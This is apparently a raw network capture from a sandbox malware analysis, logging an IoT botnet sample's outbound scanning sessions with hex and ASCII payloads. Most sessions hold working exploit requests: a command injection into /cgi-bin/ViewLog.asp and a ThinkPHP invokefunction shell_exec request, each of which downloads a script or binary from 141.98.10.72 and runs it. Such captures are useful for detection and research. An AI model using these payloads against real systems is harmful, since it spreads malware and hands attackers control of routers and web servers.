                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            784192.168.2.233673294.120.24.1468080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.525158882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            785192.168.2.235106894.120.48.138080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.525458097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            786192.168.2.234667294.120.46.708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.528855085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            787192.168.2.234525294.121.28.1958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.529078007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            788192.168.2.233904895.132.211.1218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.531752110 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            789192.168.2.2343642113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.654782057 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:28Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            790192.168.2.2355110107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.684487104 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:47Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            791192.168.2.234484662.29.88.2088080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.772810936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            792192.168.2.233794094.121.44.168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.773005009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            793192.168.2.234439294.123.182.108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:44.773578882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            794192.168.2.233760894.121.120.1428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.020138979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            795192.168.2.235997894.187.103.2408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.029376030 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            796192.168.2.2355162107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.312086105 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:47Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            797192.168.2.235153088.149.218.24280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.439033985 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:45.668911934 CET587INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 14 Feb 2024 08:29:45 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: keep-alive
                                                            Location: https:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'
                                                            Strict-Transport-Security: max-age=31536000;
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            798192.168.2.236070885.122.215.528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.509402990 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:46.137381077 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            799192.168.2.234252231.136.225.1398080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.520631075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.724296093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:54.867445946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:06.897577047 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:31.726136923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            800192.168.2.2355184107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.888279915 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:48Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            801192.168.2.235897088.212.236.4480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.898333073 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:46.128928900 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            802192.168.2.235082094.111.243.2238080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.958946943 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            803192.168.2.233303831.200.5.1308080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:45.996474981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            804192.168.2.234222095.101.202.7780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:46.101370096 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:46.305016994 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:46 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:46 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 66 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 38 36 26 23 34 36 3b 33 32 38 65 63 32 66 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1ff01002&#46;1707899386&#46;328ec2f4</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            805192.168.2.234728095.100.54.1580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:46.109060049 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:46.319514036 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
